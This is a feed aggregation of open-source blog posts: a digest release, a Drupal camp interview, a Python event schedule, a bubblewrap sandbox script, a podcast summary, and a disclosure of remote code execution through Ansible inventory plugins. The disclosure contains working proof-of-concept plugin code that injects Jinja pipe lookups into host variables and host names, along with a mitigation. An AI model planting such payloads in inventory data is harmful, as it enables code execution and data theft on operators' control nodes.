FLOSS Project Planets

Dirk Eddelbuettel: digest 0.6.35 on CRAN: New xxhash code

Planet Debian - Mon, 2024-03-11 19:23

Release 0.6.35 of the digest package arrived at CRAN today and has also been uploaded to Debian already.

digest creates hash digests of arbitrary R objects. It can use a number of different hashing algorithms (md5, sha-1, sha-256, sha-512, crc32, xxhash32, xxhash64, murmur32, spookyhash, blake3, crc32c – and now also xxh3_64 and xxh3_128), and enables easy comparison of (potentially large and nested) R language objects as it relies on the native serialization in R. It is a mature and widely-used package (with 65.8 million downloads just on the partial cloud mirrors of CRAN which keep logs) as many tasks may involve caching of objects for which it provides convenient general-purpose hash key generation to quickly identify the various objects.

This release updates the included xxHash version to the current version 0.8.2 updating the existing xxhash32 and xxhash64 hash functions — and also adding the newer xxh3_64 and xxh3_128 ones. We have a project at work using xxh3_128 from Python which made me realize having it from R would be nice too, and given the existing infrastructure in the package actually doing so was fairly quick and straightforward.

My CRANberries provides a summary of changes to the previous version. For questions or comments use the issue tracker off the GitHub repo. For documentation (including the changelog) see the documentation site.

If you like this or other open-source work I do, you can now sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Categories: FLOSS Project Planets

Liip: Throwback to Drupal Mountain Camp 2024

Planet Drupal - Mon, 2024-03-11 19:00

Against the backdrop of snow-capped peaks and invigorating alpine air, attendees immersed themselves in a whirlwind of workshops, discussions, and outdoor activities showcasing the vibrant spirit of open-source technology and the beauty of the Swiss mountains.

We took this opportunity to ask Josef Kruckenberg, Product Owner at Liip and co-organiser of the Drupal Mountain Camp, a few questions.

Josef Kruckenberg, Product Owner at Liip and co-organiser of the Drupal Mountain Camp ©Patrick Itten

What are the goals of the Drupal Mountain Camp?

The Drupal Mountain Camp brings together experts and newcomers in web development to share their knowledge of creating interactive websites using Drupal and related web technologies. We are committed to uniting a diverse crowd from different disciplines, such as developers, designers, project managers, agency and community leaders.

The main highlights include:

  • Pre-conference with skiing, snowboarding and co-working in Davos in the Swiss Alps
  • 3 keynotes on headless CMS, open-source funding and personal development
  • 3 days with workshops, sessions and exchanges around the open-source CMS Drupal

What is your involvement in this, also as a Liiper?

As Drupal Community Coordinator at Liip, Jens Vranckx and I are part of the organising team that makes the Drupal Mountain Camp happen. For this year's edition, I have been focusing on recruiting keynote speakers and inviting speakers from other countries to provide a rich and diverse line-up. I also coordinate with our marketing team, coordinate some logistics at the venue, encourage Liipers to speak, and have fun taking pictures of the event.

In our workshop, Drupal for End Users, Jonathan Noack and I compared the different ways of creating landing pages with Drupal and allowed the audience to test blökkli, our interactive, open-source page-building solution.

As a board member of the Drupal Switzerland association, I’m also organising a Drupal Local Association Updates session that acts as an exchange format for open-source leaders in countries like France, Belgium, and Switzerland.

Jonathan Noack presenting blökkli ©Patrick Itten

Which speech inspired you the most and why?

I especially enjoyed Tearyne Almandarez's talk about grit and personal development. It reminded me of how I dealt with difficult challenges in my career, how imposter syndrome can hold one back and how important it is to find clarity about where you want to go, especially if that means you have to go outside of your comfort.

What outcomes would you like to share following this edition?

The Swiss and international Drupal community had a lot to share within the days of the mountain camp.

It's inspiring to see the multitude of approaches to solve key problems, such as interactive page building with Drupal.

I'm proud of the Liip team for contributing substantially to open-source by sponsoring and co-organising Drupal Mountain Camp and sharing our knowledge in many sessions.

Conference of Jutta Horstmann ©Patrick Itten

What are the next challenges?

The Drupal Mountain Camp is all about bringing people together. The organisers will get together, do a retrospective and get ready for the next iteration. What can we do to make it more accessible? Will we do it as usual in Davos? We had a lot of good discussions already at the conference, so I’m looking forward to seeing where we take the organisation next.

For Liip, we will continue investing highly in the open-source and Drupal community. We are excited to see how the community will use blökkli and what they contribute back to it.


Python Engineering at Microsoft: Data Science Day 2024 – Schedule Announcement

Planet Python - Mon, 2024-03-11 18:05

We are thrilled to announce Python Data Science Day will be taking place March 14th, 2024; a “PyDay” on Pi Day: 3.14. If you’re a Python developer, entrepreneur, data scientist, student, or researcher working on projects from hobbyist and start up to enterprise level, you’ll find solutions to modernize your data pipelines and answer complex queries with data.

Save the date!

During the event, you will hear directly from the experts, community members and Python and Data Science Microsoft MVPs, about the latest in Python Data Science. Whether you’re a beginner or an experienced Python Data Scientist, this event is for you.

We’ll cover three main areas:

  • The latest in Data Science with Python
    • New packages and research
    • Teaching Data Science with Python
    • Interesting new Data Sets and sources for data
  • Tools for Data Science
    • Code editors and developer tools
    • Tool chains/platforms for analysis
    • AI tools for Data Science
    • Microsoft tools (Fabric, Synapse, Azure AI/ML, VS Code)
  • Scaling Data Science to the Cloud
    • Databases + Data ingestion
    • Cloud-based computation and collaboration
    • Cloud resource management + DevOps

Agenda

| Session Title | Theme | Audience | Speaker | Time (Pacific) | Type |
|---|---|---|---|---|---|
| Welcome | | All | Dawn Wages & Hosts! | 9:00AM | |
| From Data to Insights: Data Science with Microsoft Fabric | Data Science Tools | Beginner; Intermediate | Jasmine Greennaway, Ismaël Mejía | 9:10AM | 5 – 10 minute Lightning Talk |
| Revolutionizing Data Science Workflows: Unleashing the Potential of Microsoft Visual Studio Code | Data Science Tools | Beginner; Student; Hobbyist; Research | Sumukh M G | 9:20AM | 5 – 10 minute Lightning Talk |
| RAG using Semantic Kernel with Azure OpenAI and Azure Cosmos DB for MongoDB vCore | Data Science Tools; Scaling to the Cloud | Intermediate; Advanced; Start Up; Student; Hobbyist | John Aziz | 9:30AM | 25 minute session |
| Simplifying Data Analysis & Visualization (for non-Python devs) with AI | Data Science Tools | Beginner; Intermediate; Student; Research; Hobbyist | Nitya Narasimhan, PhD | 10:00AM | 25 minute session |
| Getting started with Python using Data Wrangler in Microsoft Fabric | Data Science Tools; Get started with Data Science | Beginner; Intermediate | Sandeep Pawar | 10:35AM | 5 – 10 minute Lightning Talk |
| Buddy Driven Development | Latest in Data Science | Beginner; Intermediate | Bethany Jepchumba | 10:45AM | 5 – 10 minute Lightning Talk |
| Supercharging your Data Science projects with GitHub tools | Data Science Tools | Intermediate; Start Up; Enterprise; Student | Carlotta Castelluccio | 10:55AM | 25 minute session |
| Streamlining Data Preparation with Pydantic: A 25-Minute Guide | Data Science Tools; Latest in Data Science | Intermediate | Hasan Özdemir | 11:25AM | 25 minute session |
| Level Up Your ML Game: Building Models like a Pro with Microsoft Fabric’s Synapse | Data Science Tools; Latest in Data Science | Beginner; Intermediate; Start Up; Enterprise; Student | Vinayak Gavariya | 11:55AM | 5 – 10 minute Lightning Talk |
| Python Data Science Skilling – Cloud Skills Challenge | Data Science Tools; Latest in Data Science; Get started with Data Science | Beginner; Intermediate; Advanced; Start Up; Student; Research; Hobbyist | Aaron Stark | 12:05PM | 5 – 10 minute Lightning Talk |
| Unleash The Power of Deep Learning: Build A Dog vs Cat Image Classifer Using CNN With TensorFlow Keras | Latest in Data Science | Intermediate; Student; Research | Jyothi Swaroop Makena | 12:15PM | 25 minute session |
| Serverless Jupyter Notebook Functions | Latest in Data Science; Scaling to the Cloud | Intermediate; Student; Research | — | 12:45PM | 25 minute session |
| Beyond Keywords: Image similarity search in Azure Cosmos DB for PostgreSQL | Data Science Tools | Intermediate | Foteini Savvidou | 1:20PM | 5 – 10 minute Lightning Talk |
| Python at Microsoft | | All Levels | Dawn Wages | 1:30PM | 5 – 10 minute Lightning Talk |
| Microsoft Fabric for Python Developers | Data Science Tools; Latest in Data Science | Beginner; Intermediate | Eren Orbey | 1:40PM | 25 minute session |
| Data Science: The Bear* Necessities | Data Science Tools; Get started with Data Science | Beginner; Student; Hobbyist | Renee Noble | 2:10PM | 25 minute session |
| Surprise Guest! | TBA | Beginner; Student; Hobbyist | TBA | 2:40PM | 5 – 10 minute Lightning Talk |
| Surprise Guest! | TBA | Beginner; Student; Hobbyist | TBA | 2:50PM | 5 – 10 minute Lightning Talk |
| Empowering Data-Driven Innovation: A Journey through Real-World Applications | Latest in Data Science | Intermediate | Abdullah Awan | 3:30PM | 25 minute session |
| Breaking Data Silos With Semantic Link In Microsoft Fabric | Data Science Tools; Latest in Data Science | Intermediate | Sandeep Pawar | 4:05PM | 25 minute session |

More ways to engage with all the Data Science fun:

  • Join the Microsoft Fabric Global AI Hack Together on February 15th to March 4th, 2024. Fabric is an end-to-end AI-powered analytics platform that unites your data and services, including data science and data lakes. Register for the event to participate in live streams every week and solve real-world problems with guidance and a community.
  • Read our 14 Days of Python Data Science series where for fourteen days leading up to Python Data Science Day, we will drop cool articles and recipes for using Data Science on Microsoft tools. #14DaysOfDataScience
  • Check out the Data Science Cloud Skills Challenge if you want to go through some self-paced learning! This challenge is active until April 15th, 2024.
  • Join us on Discord at https://aka.ms/python-discord
More Data Science at Microsoft…

The post Data Science Day 2024 – Schedule Announcement appeared first on Python.


TEN7: Just Say Drupal

Planet Drupal - Mon, 2024-03-11 17:52
A community call to action... let's ditch version numbers in the brand and just say Drupal. Drupal 7 becomes “Legacy Drupal” but we keep semantic versions around and invest in operational best practices.

ImageX: Integrate Zoom Meetings Seamlessly into Your Drupal Website via Our Developer’s Module

Planet Drupal - Mon, 2024-03-11 17:47

Authored by: Nadiia Nykolaichuk and Leonid Bogdanovych.

Zoom is a key player in the sphere of online meetings. They have the power to dissolve geographical barriers, uniting individuals and teams across vast distances for communication and collaboration. What can be more convenient than using a robust video conferencing platform? Using it in the comfort of your own Drupal website!


Joachim Breitner: Convenient sandboxed development environment

Planet Debian - Mon, 2024-03-11 16:39

I like using one machine and setup for everything, from serious development work to hobby projects to managing my finances. This is very convenient, as often the lines between these are blurred. But it is also scary if I think of the large number of people who I have to trust to not want to extract all my personal data. Whenever I run a cabal install, or a fun VSCode extension gets updated, or anything like that, I am running code that could be malicious or buggy.

In a way it is surprising and reassuring that, as far as I can tell, this commonly does not happen. Most open source developers out there seem to be nice and well-meaning, after all.

Convenient or it won’t happen

Nevertheless I thought I should do something about this. The safest option would probably be to use dedicated virtual machines for the development work, with very little interaction with my main system. But knowing me, that did not seem likely to happen, as it sounded like a fair amount of hassle. So I aimed for a viable compromise between security and convenience, and one that does not get too much in the way of my current habits.

For instance, it seems desirable to have the project files accessible from my unconstrained environment. This way, I could perform certain actions that need access to secret keys or tokens, but are (unlikely) to run code (e.g. git push, git pull from private repositories, gh pr create) from “the outside”, and the actual build environment can do without access to these secrets.

The user experience I thus want is a quick way to enter a “development environment” where I can do most of the things I need to do while programming (network access, running command line and GUI programs), with access to the current project, but without access to my actual /home directory.

I initially followed the blog post “Application Isolation using NixOS Containers” by Marcin Sucharski and got something working that mostly did what I wanted, but then a colleague pointed out that tools like firejail can achieve roughly the same with a less “global” setup. I tried to use firejail, but found it to be a bit too inflexible for my particular whims, so I ended up writing a small wrapper around the lower level sandboxing tool https://github.com/containers/bubblewrap.

Selective bubblewrapping

This script, called dev and included below, builds a new filesystem namespace with minimal /proc and /dev directories, and its own /tmp directories. It then bind-mounts some directories to make the host’s NixOS system available inside the container (/bin, /usr, the nix store including domain socket, stuff for OpenGL applications). My user’s home directory is taken from ~/.dev-home and some configuration files are bind-mounted for convenient sharing. I intentionally don’t share most of the configuration – for example, a direnv enable in the dev environment should not affect the main environment. The X11 socket for graphical applications and the corresponding .Xauthority file is made available. And finally, if I run dev in a project directory, this project directory is bind mounted writable, and the current working directory is preserved.

The effect is that I can type dev on the command line to enter “dev mode” rather conveniently. I can run development tools, including graphical ones like VSCode, and especially the latter with its extensions is part of the sandbox. To do a git push I either exit the development environment (Ctrl-D) or open a separate terminal. Overall, the inconvenience of switching back and forth seems worth the extra protection.

Clearly, this isn’t going to hold against a determined and maybe targeted attacker (e.g. access to the X11 and the nix daemon socket can probably be used to escape easily). But I hope it will help against a compromised dev dependency that just deletes or exfiltrates data, like keys or passwords, from the usual places in $HOME.

Rough corners

There is more polishing that could be done.

  • In particular, clicking on a link inside VSCode in the container will currently open Firefox inside the container, without access to my settings and cookies etc. Ideally, links would be opened in the Firefox running outside. This is a problem that has a solution in the world of applications that are sandboxed with Flatpak, and involves a bunch of moving parts (a xdg-desktop-portal user service, a filtering dbus proxy, exposing access to that proxy in the container). I experimented with that for a bit longer than I should have, but could not get it to work to satisfaction (even without a container involved, I could not get xdg-desktop-portal to heed my default browser settings…). For now I will live with manually copying and pasting URLs, we’ll see how long this lasts.

  • With this setup (and unlike the NixOS container setup I tried first), the same applications are installed inside and outside. It might be useful to separate the set of installed programs: There is simply no point in running evolution or firefox inside the container, and if I do not even have VSCode or cabal available outside, it’s less likely that I forget to enter dev before using these tools.

    It shouldn’t be too hard to cargo-cult some of the NixOS Containers infrastructure to be able to have a separate system configuration that I can manage as part of my normal system configuration and make available to bubblewrap here.

So likely I will refine this some more over time. Or get tired of typing dev and go back to what I did before…

The script

The dev script (at the time of writing)

    #!/usr/bin/env bash

    extra=()
    if [[ "$PWD" == /home/jojo/build/* ]] || [[ "$PWD" == /home/jojo/projekte/programming/* ]]
    then
      extra+=(--bind "$PWD" "$PWD" --chdir "$PWD")
    fi

    if [ -n "$1" ]
    then
      cmd=( "$@" )
    else
      cmd=( bash )
    fi

    # Caveats:
    # * access to all of `/etc`
    # * access to `/nix/var/nix/daemon-socket/socket`, and is trusted user (but needed to run nix)
    # * access to X11

    exec bwrap \
      --unshare-all \
      \
      `# blank slate` \
      --share-net \
      --proc /proc \
      --dev /dev \
      --tmpfs /tmp \
      --tmpfs /run/user/1000 \
      \
      `# Needed for GLX applications, in particular alacritty` \
      --dev-bind /dev/dri /dev/dri \
      --ro-bind /sys/dev/char /sys/dev/char \
      --ro-bind /sys/devices/pci0000:00 /sys/devices/pci0000:00 \
      --ro-bind /run/opengl-driver /run/opengl-driver \
      \
      --ro-bind /bin /bin \
      --ro-bind /usr /usr \
      --ro-bind /run/current-system /run/current-system \
      --ro-bind /nix /nix \
      --ro-bind /etc /etc \
      --ro-bind /run/systemd/resolve/stub-resolv.conf /run/systemd/resolve/stub-resolv.conf \
      \
      --bind ~/.dev-home /home/jojo \
      --ro-bind ~/.config/alacritty ~/.config/alacritty \
      --ro-bind ~/.config/nvim ~/.config/nvim \
      --ro-bind ~/.local/share/nvim ~/.local/share/nvim \
      --ro-bind ~/.bin ~/.bin \
      \
      --bind /tmp/.X11-unix/X0 /tmp/.X11-unix/X0 \
      --bind ~/.Xauthority ~/.Xauthority \
      --setenv DISPLAY :0 \
      \
      --setenv container dev \
      "${extra[@]}" \
      -- \
      "${cmd[@]}"
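
To see what a bwrap argument list like the one in the dev script actually exposes, the following added example (not part of the original post or of bubblewrap) parses the arguments and reports writable host paths and reachable secrets and sockets. The expanded paths, the project directory /home/jojo/build/demo and the list of secret directories are assumptions; the two sockets are the ones named in the post's caveats.

```python
from pathlib import PurePosixPath

# Number of arguments taken by each bwrap option that the dev script uses.
ARITY = {
    "--unshare-all": 0, "--share-net": 0,
    "--proc": 1, "--dev": 1, "--tmpfs": 1, "--chdir": 1,
    "--bind": 2, "--ro-bind": 2, "--dev-bind": 2, "--setenv": 2,
}
WRITABLE = {"--bind", "--dev-bind"}  # --ro-bind is the read-only variant


def parse_bwrap(argv):
    """Split a bwrap argument list into bind mounts, other options and the command."""
    mounts, options, i = [], [], 0
    while i < len(argv):
        opt = argv[i]
        if opt == "--":
            return mounts, options, argv[i + 1:]
        if opt not in ARITY:
            raise ValueError(f"option not handled by this example: {opt}")
        args = argv[i + 1:i + 1 + ARITY[opt]]
        if len(args) != ARITY[opt]:
            raise ValueError(f"{opt} expects {ARITY[opt]} argument(s)")
        if opt.endswith("bind"):
            mounts.append({"src": args[0], "dest": args[1],
                           "writable": opt in WRITABLE})
        else:
            options.append((opt, *args))
        i += 1 + ARITY[opt]
    return mounts, options, []


def covers(src, target):
    """True if bind-mounting src makes target visible (src is target or an ancestor)."""
    src, target = PurePosixPath(src), PurePosixPath(target)
    return src == target or src in target.parents


def review(argv, secrets, sockets):
    """Summarise what the sandbox described by argv can reach on the host."""
    mounts, options, _ = parse_bwrap(argv)
    return {
        "network_shared": ("--share-net",) in options,
        "writable": [m["src"] for m in mounts if m["writable"]],
        "secrets_exposed": sorted({s for s in secrets for m in mounts
                                   if covers(m["src"], s)}),
        "sockets_exposed": sorted({s for s in sockets for m in mounts
                                   if covers(m["src"], s)}),
    }


# Assumption: typical secret locations in the real home directory.
SECRETS = ["/home/jojo/.ssh", "/home/jojo/.gnupg"]
# The two sockets the post's caveats mention.
SOCKETS = ["/nix/var/nix/daemon-socket/socket", "/tmp/.X11-unix/X0"]

# Constructed from the dev script: ~ expanded to /home/jojo, comments dropped,
# and /home/jojo/build/demo assumed as the current project directory.
DEV_ARGV = [
    "--unshare-all", "--share-net",
    "--proc", "/proc", "--dev", "/dev",
    "--tmpfs", "/tmp", "--tmpfs", "/run/user/1000",
    "--dev-bind", "/dev/dri", "/dev/dri",
    "--ro-bind", "/sys/dev/char", "/sys/dev/char",
    "--ro-bind", "/run/opengl-driver", "/run/opengl-driver",
    "--ro-bind", "/bin", "/bin", "--ro-bind", "/usr", "/usr",
    "--ro-bind", "/run/current-system", "/run/current-system",
    "--ro-bind", "/nix", "/nix", "--ro-bind", "/etc", "/etc",
    "--bind", "/home/jojo/.dev-home", "/home/jojo",
    "--ro-bind", "/home/jojo/.config/nvim", "/home/jojo/.config/nvim",
    "--bind", "/tmp/.X11-unix/X0", "/tmp/.X11-unix/X0",
    "--bind", "/home/jojo/.Xauthority", "/home/jojo/.Xauthority",
    "--setenv", "DISPLAY", ":0", "--setenv", "container", "dev",
    "--bind", "/home/jojo/build/demo", "/home/jojo/build/demo",
    "--chdir", "/home/jojo/build/demo",
    "--", "bash",
]

# Weak variant for comparison: the real home directory is bound writable.
WEAK_ARGV = ["--unshare-all", "--bind", "/home/jojo", "/home/jojo", "--", "bash"]

if __name__ == "__main__":
    for name, argv in (("dev", DEV_ARGV), ("weak", WEAK_ARGV)):
        print(name)
        for key, value in review(argv, SECRETS, SOCKETS).items():
            print(f"  {key}: {value}")
```
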

Test and Code: 216: ruff, uv, and Astral: Python tooling, much faster, with Rust

Planet Python - Mon, 2024-03-11 16:12

Charlie Marsh and team are using Rust to make Python tooling faster.

  • Ruff can take the place of Flake8, isort, and Black, and so much more.
  • uv can take the place of pip, pip-tools, and virtualenv
  • Astral is Charlie's venture backed company, and what they have with `ruff` and `uv` is just the start.

Since uv is the newest tool, there's quite a bit of the discussion diving into uv.

Links:

  • ruff: https://astral.sh/ruff
  • Astral: https://astral.sh
  • uv: https://github.com/astral-sh/uv

Sponsored by PyCharm Pro

  • Use code PYTEST for 20% off PyCharm Professional at jetbrains.com/pycharm (https://www.jetbrains.com/pycharm/)
  • First 10 to sign up this month get a free month of AI Assistant
  • See how easy it is to run pytest from PyCharm at pythontest.com/pycharm (https://pythontest.com/pycharm/)

The Complete pytest Course

  • For the fastest way to learn pytest, go to courses.pythontest.com (https://courses.pythontest.com/p/complete-pytest-course)
  • Whether you're new to testing or pytest, or just want to maximize your efficiency and effectiveness when testing.

Evgeni Golov: Remote Code Execution in Ansible dynamic inventory plugins

Planet Debian - Mon, 2024-03-11 16:00

I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now.

TL;DR

Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it.

Inventory plugins

Inventory plugins allow Ansible to pull inventory data from a variety of sources. The most common ones are probably the ones fetching instances from clouds like Amazon EC2 and Hetzner Cloud or the ones talking to tools like Foreman.

For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any). But it can also set any arbitrary variable for that host, which is often used to provide additional information about it. These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object.

And this is where things are getting interesting. Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host. And if that comment contains a Jinja expression, it might get executed. And if that Jinja expression is using the pipe lookup, it might get executed in your shell.

Let that sink in for a moment, and then we'll look at an example.

Example inventory plugin

    from ansible.plugins.inventory import BaseInventoryPlugin


    class InventoryModule(BaseInventoryPlugin):

        NAME = 'evgeni.inventoryrce.inventory'

        def verify_file(self, path):
            valid = False
            if super(InventoryModule, self).verify_file(path):
                if path.endswith('evgeni.yml'):
                    valid = True
            return valid

        def parse(self, inventory, loader, path, cache=True):
            super(InventoryModule, self).parse(inventory, loader, path, cache)
            self.inventory.add_host('exploit.example.com')
            self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local')
            self.inventory.set_variable('exploit.example.com', 'something_funny', '{{ lookup("pipe", "touch /tmp/hacked" ) }}')

The code is mostly copy & paste from the Developing dynamic inventory docs for Ansible and does three things:

  1. defines the plugin name as evgeni.inventoryrce.inventory
  2. accepts any config that ends with evgeni.yml (we'll need that to trigger the use of this inventory later)
  3. adds an imaginary host exploit.example.com with local connection type and something_funny variable to the inventory

In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc. But the structure of the code would be very similar.

The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host.

Using the example inventory plugin

Now we install the collection containing this inventory plugin, or rather write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from).

And we create a configuration file. As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need.

If we now call ansible-inventory, we'll see our host and our variable present:

    % ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list
    {
        "_meta": {
            "hostvars": {
                "exploit.example.com": {
                    "ansible_connection": "local",
                    "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"
                }
            }
        },
        "all": {
            "children": [
                "ungrouped"
            ]
        },
        "ungrouped": {
            "hosts": [
                "exploit.example.com"
            ]
        }
    }

(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.)

So far, nothing dangerous has happened. The inventory got generated, the host is present, the funny variable is set, but it's still only a string.

Executing a playbook, interpreting Jinja

To execute the code we'd need to use the variable in a context where Jinja is used. This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM.

Or a debug task where you dump all variables of a host to analyze what's set. Let's use that!

    - hosts: all
      tasks:
        - name: Display all variables/facts known for a host
          ansible.builtin.debug:
            var: hostvars[inventory_hostname]

This playbook looks totally innocent: run against all hosts and dump their hostvars using debug. No mention of our funny variable. Yet, when we execute it, we see:

    % ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml

    PLAY [all] ************************************************************************************************

    TASK [Gathering Facts] ************************************************************************************
    ok: [exploit.example.com]

    TASK [Display all variables/facts known for a host] *******************************************************
    ok: [exploit.example.com] => {
        "hostvars[inventory_hostname]": {
            "ansible_all_ipv4_addresses": [
                "192.168.122.1"
            ],
            …
            "something_funny": ""
        }
    }

    PLAY RECAP *************************************************************************************************
    exploit.example.com : ok=2 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0

We got all variables dumped, that was expected, but now something_funny is an empty string? Jinja got executed, and the expression was {{ lookup("pipe", "touch /tmp/hacked" ) }} and touch does not return anything. But it did create the file!

    % ls -alh /tmp/hacked
    -rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked

We just "hacked" the Ansible control node (aka: your laptop), as that's where lookup is executed. It could also have used the url lookup to send the contents of your Ansible vault to some internet host. Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/….

Why is this possible?

This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe and Ansible processes everything with Jinja in it.

In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:

    from ansible.utils.unsafe_proxy import wrap_var
    …
    self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('{{ lookup("pipe", "touch /tmp/hacked" ) }}'))

Which then gets rendered as a string when dumping the variables using debug:

    "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"

But it seems inventories don't do this:

    for k, v in host_vars.items():
        self.inventory.set_variable(name, k, v)

(aws_ec2.py)

    for key, value in hostvars.items():
        self.inventory.set_variable(hostname, key, value)

(hcloud.py)

    for k, v in hostvars.items():
        try:
            self.inventory.set_variable(host_name, k, v)
        except ValueError as e:
            self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))

(foreman.py)

And honestly, I can totally understand that. When developing an inventory, you do not expect to handle insecure input data. You also expect the API to handle the data in a secure way by default. But set_variable doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe".

Can something similar happen in other parts of Ansible?

It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481

But even if we only look at inventories, add_host(host) can be abused in a similar way:

    from ansible.plugins.inventory import BaseInventoryPlugin


    class InventoryModule(BaseInventoryPlugin):

        NAME = 'evgeni.inventoryrce.inventory'

        def verify_file(self, path):
            valid = False
            if super(InventoryModule, self).verify_file(path):
                if path.endswith('evgeni.yml'):
                    valid = True
            return valid

        def parse(self, inventory, loader, path, cache=True):
            super(InventoryModule, self).parse(inventory, loader, path, cache)
            self.inventory.add_host('lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}')

    % ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml

    PLAY [all] ************************************************************************************************

    TASK [Gathering Facts] ************************************************************************************
    fatal: [lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true}

    PLAY RECAP ************************************************************************************************
    lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }} : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0

    % ls -alh /tmp/hacked-host
    -rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host

Affected versions

I've tried this on Ansible (core) 2.13.13 and 2.16.4. I'd totally expect older versions to be affected too, but I have not verified that.
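
A defensive check for the behaviour described in this post, as an added example that is not part of the original post or of Ansible: it walks the JSON printed by ansible-inventory --list and reports host names and host variables that contain Jinja delimiters, so they can be reviewed before a playbook templates them. The sample inventory is constructed from the values shown above; web1.example.com and its tags are made up, and matching on delimiters is a heuristic chosen for this example.

```python
import json
import sys

# Openers of Jinja expressions, statements and comments.
JINJA_MARKERS = ("{{", "{%", "{#")


def looks_like_template(value):
    """True for strings that contain a Jinja delimiter."""
    return isinstance(value, str) and any(m in value for m in JINJA_MARKERS)


def strings_in(value, path=""):
    """Yield (path, string) for every string nested inside a host variable."""
    if isinstance(value, str):
        yield path, value
    elif isinstance(value, dict):
        for key, item in value.items():
            yield from strings_in(item, f"{path}.{key}" if path else str(key))
    elif isinstance(value, list):
        for index, item in enumerate(value):
            yield from strings_in(item, f"{path}[{index}]")


def audit_inventory(inventory):
    """Return (host, location, value) for each suspicious name or variable.

    `inventory` is the parsed output of `ansible-inventory --list`.
    """
    findings = []
    hostvars = inventory.get("_meta", {}).get("hostvars", {})

    # Host names appear as hostvars keys and in each group's "hosts" list.
    hosts = set(hostvars)
    for group, data in inventory.items():
        if group != "_meta" and isinstance(data, dict):
            hosts.update(data.get("hosts", []))
    for host in sorted(hosts):
        if looks_like_template(host):
            findings.append((host, "<hostname>", host))

    # Host variables can be nested (tags, parameters), so walk them fully.
    for host, variables in sorted(hostvars.items()):
        for path, text in strings_in(variables):
            if looks_like_template(text):
                findings.append((host, path, text))
    return findings


# Constructed sample, modelled on the ansible-inventory output in the post.
SAMPLE = {
    "_meta": {"hostvars": {
        "exploit.example.com": {
            "ansible_connection": "local",
            "something_funny": '{{ lookup("pipe", "touch /tmp/hacked" ) }}',
        },
        "web1.example.com": {
            "ansible_host": "192.0.2.10",
            "tags": {"owner": "ops",
                     "notes": ["plain text", "{% if x %}y{% endif %}"]},
        },
    }},
    "all": {"children": ["ungrouped"]},
    "ungrouped": {"hosts": [
        "exploit.example.com",
        "web1.example.com",
        'lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}',
    ]},
}

if __name__ == "__main__":
    # With a file argument, audit saved `ansible-inventory --list` output;
    # without one, audit the constructed sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as handle:
            data = json.load(handle)
    else:
        data = SAMPLE
    results = audit_inventory(data)
    for host, location, value in results:
        print(f"{host}: {location}: {value!r}")
    sys.exit(1 if results else 0)
```
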


FSF Events: Free Software Directory meeting on IRC: Friday, March 15, starting at 12:00 EDT (16:00 UTC)

GNU Planet! - Mon, 2024-03-11 15:55
Join the FSF and friends on Friday, March 15, from 12:00 to 15:00 EDT (16:00 to 19:00 UTC) to help improve the Free Software Directory.

Talking Drupal: Talking Drupal #441 - CI for Drupal modules

Planet Drupal - Mon, 2024-03-11 15:00

Today we are talking about CI for Drupal modules, how it helps us build Drupal, and the ongoing work and improvements being made with guest Fran Garcia-Linares. We’ll also cover Require on Publish as our module of the week.

For show notes visit: www.talkingDrupal.com/441

Topics
  • What does CI mean
  • How do Drupal modules use CI
  • When we talk about Drupal CI are we talking about the website itself or the CI that supports contributors
  • What tools does Drupal use for CI
  • How do maintainers interact with CI
  • What changes have happened in the last year
  • Speed improvements
  • Drupal CI vs Gitlab CI
  • Process to convert
  • When is Drupal CI being shut down
  • What improvements are coming
  • If someone has an issue where do they get help
Resources

Guests

Fran Garcia-Linares - fjgarlin

Hosts

Nic Laflin - nLighteneddevelopment.com nicxvan
John Picozzi - epam.com johnpicozzi
Anna Mykhailova - kalamuna.com amykhailova

MOTW Correspondent

Martin Anderson-Clutz - mandclu

  • Brief description:
    • Have you ever wanted to have content fields that could be optional until a piece of content is published, or ready to be published? There’s a module for that.
  • Module name/project name:
  • Brief history
